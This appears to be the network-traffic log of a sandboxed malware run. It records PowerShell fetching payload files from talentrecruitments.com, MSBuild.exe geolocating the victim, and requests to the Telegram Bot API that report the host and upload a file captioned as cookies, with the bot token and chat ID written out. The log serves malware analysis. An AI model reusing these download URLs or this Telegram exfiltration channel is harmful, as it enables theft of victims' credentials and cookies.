Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZmM%2Bcg%2Ba%2BqwkBv1gU7uuIIbFZCCXy%2Ba38X8glUKQKiqoRaDLitfNwKIW0bJUS7qQjF%2BTKNZSP3Ss%2BTwQe4WSeKbx8Qo1fdUjL9OCrE6R4do%2FNBgXVyC1X5QF9RNeB7fnrvkZ0%2Fbn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc4bce66edee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=57595&min_rtt=49856&rtt_var=22582&sent=7&recv=9&lost=0&retrans=1&sent_bytes=4532&recv_bytes=482&delivery_rate=80778&cwnd=255&unsent_bytes=0&cid=d12a42917be55283&ts=1133&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:40 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466813
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ggfIfomDLnpbqKjkLtstaHt8dN3QNuebszwplkpJ5yYHHLwrPfW1ClyYeuycPcDWHPjBl9JYQzAzf7xWq%2FPfhi%2FZYHoHrwDelEOJotMCAa0B6lv2eqUDAdvy0QQRYOXVi25PUiqE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc4d0991edee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=61585&min_rtt=49856&rtt_var=24917&sent=8&recv=11&lost=0&retrans=1&sent_bytes=5811&recv_bytes=574&delivery_rate=80778&cwnd=256&unsent_bytes=0&cid=d12a42917be55283&ts=1326&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:40 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466813
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nx8GoQRh2i%2F8E3sNnEp741wOCQCVfDKI7v2oYmy2jC7lZnHqaMKgs3upFXGG4bbWtpurKBO%2FzZJpXFDsPuVxygg40DMcYiX6jd3uUuyrvLpGVjScYvm4gIK%2BnsjfK%2BFzrboLdUWh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc4e4d62edee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=64437&min_rtt=49856&rtt_var=24392&sent=9&recv=13&lost=0&retrans=1&sent_bytes=7079&recv_bytes=666&delivery_rate=80778&cwnd=257&unsent_bytes=0&cid=d12a42917be55283&ts=1530&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:43 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466816
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HM0WTPHPsgHJrsWd7Q8Kzc7UzwFsHvfrvtvRcjSbYgy2wrRBrw2fq%2Fc9%2BS8fkLZm9pxwIUYbLvlUZnfd8IyID70kCHeiodBgMwXNP0cWXQsyXyzZNaPp8gyUY7iFqVEuI827wD2h"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc601fdcedee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=68960&min_rtt=49856&rtt_var=27339&sent=10&recv=15&lost=0&retrans=1&sent_bytes=8351&recv_bytes=758&delivery_rate=80778&cwnd=257&unsent_bytes=0&cid=d12a42917be55283&ts=4379&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:43 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466816
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i0qaQWMF0RLT9qhm7UOhQVWkgW6%2B3eqTwwLTKmHvZDUrGAOur4w%2Fw6shkQw5xi6fFTmKboKH3hiELjPqH9tY%2FAeDQBsyIU%2BPgLJ3uGtq8wVgNhmUJyA5t6ZrJfHi%2BwtNferwvfOI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc613ab2edee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=72125&min_rtt=49856&rtt_var=26834&sent=11&recv=17&lost=0&retrans=1&sent_bytes=9620&recv_bytes=850&delivery_rate=80778&cwnd=257&unsent_bytes=0&cid=d12a42917be55283&ts=4569&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:43 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466816
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6n6G0giwKeT8z0mnKK7%2FxuaJTdPM8tVsj0GeJaA8TS8fpGq2%2B356mM2mKCn1D9pGtkQDtRzAkm0YHsEI48KB4qQX8gj7CdkNwHvL7mVsWIpYh%2FTnZHsnUXczz5DQz7aifRHXCfLk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc626deaedee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=74490&min_rtt=49856&rtt_var=24855&sent=12&recv=19&lost=0&retrans=1&sent_bytes=10895&recv_bytes=942&delivery_rate=80778&cwnd=257&unsent_bytes=0&cid=d12a42917be55283&ts=4753&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:44 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466817
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjkXJqoLRLSHBIVoneZIi5CC%2F%2BsawfoK2O0HggaFTl9GIdxb4wp6QG0HGPLfoaV4mwAsVurmUyYy8Tssb9vq%2FCwzeQeU5vh7MCHG0Fu7u7OERMHlCaSOuHaxEY6bk8wu6mqLMlHu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc69db80edee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=77027&min_rtt=49856&rtt_var=23715&sent=13&recv=21&lost=0&retrans=1&sent_bytes=12167&recv_bytes=1034&delivery_rate=80778&cwnd=257&unsent_bytes=0&cid=d12a42917be55283&ts=5945&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:45 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466818
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LYzFqT5Lzp6MNRkkNZ83syNMmvgIxaPNFCkJKOuhyR0TAtxPlGWmI%2B1UdbzN26G8eby5iQrhpQ9BbgbFt4HSak%2FHKIMAkIJDDtjHiXGPH1YmMltSljZHRQdJb9vXxQwWav%2B1QcG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc6e69ffedee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=78743&min_rtt=49856&rtt_var=21219&sent=14&recv=23&lost=0&retrans=1&sent_bytes=13440&recv_bytes=1126&delivery_rate=80778&cwnd=257&unsent_bytes=0&cid=d12a42917be55283&ts=6670&x=0"
DNS

api.telegram.org

MSBuild.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:EPFPAFGQ%0D%0ADate%20and%20Time:%203/25/2025%20/%201:25:43%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20EPFPAFGQ%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

MSBuild.exe

Remote address:

149.154.167.220:443

Request

GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:EPFPAFGQ%0D%0ADate%20and%20Time:%203/25/2025%20/%201:25:43%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20EPFPAFGQ%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Tue, 25 Mar 2025 13:25:45 GMT
Content-Type: application/json
Content-Length: 55
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://api.telegram.org/bot8047024230:AAEOgyfPgNxsX6e5QUEWyOZOAYOzCPtuimk/sendDocument?chat_id=769249322&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery

MSBuild.exe

Remote address:

149.154.167.220:443

Request

POST /bot8047024230:AAEOgyfPgNxsX6e5QUEWyOZOAYOzCPtuimk/sendDocument?chat_id=769249322&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd6ba08f5c02e6
Host: api.telegram.org
Content-Length: 741

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Tue, 25 Mar 2025 13:25:51 GMT
Content-Type: application/json
Content-Length: 536
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388244_1P2JRD3AGFSOMNDB6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388244_1P2JRD3AGFSOMNDB6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 491307
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D868CBF20B2446AA9480061DEADFF452 Ref B: LON04EDGE0722 Ref C: 2025-03-25T13:25:59Z
date: Tue, 25 Mar 2025 13:25:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360494465_1WL11PE3QHWZ3Q9V1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360494465_1WL11PE3QHWZ3Q9V1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 539839
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4BF083CA0571450999CE43608C2BA6FC Ref B: LON04EDGE0722 Ref C: 2025-03-25T13:25:59Z
date: Tue, 25 Mar 2025 13:25:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360494466_1NE7RS5P7DA5W3Y3W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360494466_1NE7RS5P7DA5W3Y3W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 634784
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E22E019968C9484A9B225DFD6752D945 Ref B: LON04EDGE0722 Ref C: 2025-03-25T13:25:59Z
date: Tue, 25 Mar 2025 13:25:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360284769_1MZRDKC60P8EUCQ67&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360284769_1MZRDKC60P8EUCQ67&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 597495
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E0B381CC585F4FF2BB71CCAB8AC1124D Ref B: LON04EDGE0722 Ref C: 2025-03-25T13:25:59Z
date: Tue, 25 Mar 2025 13:25:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360284768_1XECHE7M3RRM42RYU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360284768_1XECHE7M3RRM42RYU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 628251
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D941C6ED3B7D498B980AF26C86BEBA43 Ref B: LON04EDGE0722 Ref C: 2025-03-25T13:25:59Z
date: Tue, 25 Mar 2025 13:25:59 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388245_16B3D0YLJOJ1VFN1S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388245_16B3D0YLJOJ1VFN1S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 618722
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6EA2261D6A9B4097BD7673BAC027BC45 Ref B: LON04EDGE0722 Ref C: 2025-03-25T13:25:59Z
date: Tue, 25 Mar 2025 13:25:59 GMT
DNS

c.pki.goog

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.179.227
GET

http://c.pki.goog/r/r1.crl

Remote address:

142.250.179.227:80

Request

GET /r/r1.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 304 Not Modified

Date: Tue, 25 Mar 2025 13:11:32 GMT
Expires: Tue, 25 Mar 2025 14:01:32 GMT
Age: 892
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding

67.23.254.14:443

https://talentrecruitments.com/new_image.jpg

tls, http

powershell.exe

135.4kB
3.5MB
2099
2508

HTTP Request

GET https://talentrecruitments.com/new_image.jpg

HTTP Response

200
150.171.27.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

tls, http2

2.0kB
9.4kB
22
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

HTTP Response

204
67.23.254.14:443

https://talentrecruitments.com/ConvertedFile.txt

tls, http

powershell.exe

11.1kB
390.2kB
204
285

HTTP Request

GET https://talentrecruitments.com/ConvertedFile.txt

HTTP Response

200
193.122.130.0:80

http://checkip.dyndns.org/

http

MSBuild.exe

2.7kB
4.1kB
25
21

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
104.21.16.1:443

https://reallyfreegeoip.org/xml/212.102.63.147

tls, http

MSBuild.exe

2.4kB
15.4kB
27
17

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/212.102.63.147

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot8047024230:AAEOgyfPgNxsX6e5QUEWyOZOAYOzCPtuimk/sendDocument?chat_id=769249322&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery

tls, http

MSBuild.exe

2.4kB
7.8kB
14
14

HTTP Request

GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:EPFPAFGQ%0D%0ADate%20and%20Time:%203/25/2025%20/%201:25:43%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20EPFPAFGQ%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

HTTP Response

404

HTTP Request

POST https://api.telegram.org/bot8047024230:AAEOgyfPgNxsX6e5QUEWyOZOAYOzCPtuimk/sendDocument?chat_id=769249322&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20Admin%20%7C%20VIP%20Recovery

HTTP Response

200
150.171.27.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239339388245_16B3D0YLJOJ1VFN1S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

124.6kB
3.6MB
2635
2629

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388244_1P2JRD3AGFSOMNDB6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360494465_1WL11PE3QHWZ3Q9V1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360494466_1NE7RS5P7DA5W3Y3W&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360284769_1MZRDKC60P8EUCQ67&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360284768_1XECHE7M3RRM42RYU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339388245_16B3D0YLJOJ1VFN1S&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
12
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.27.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
142.250.179.227:80

http://c.pki.goog/r/r1.crl

http

476 B
394 B
6
4

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

304

8.8.8.8:53

talentrecruitments.com

dns

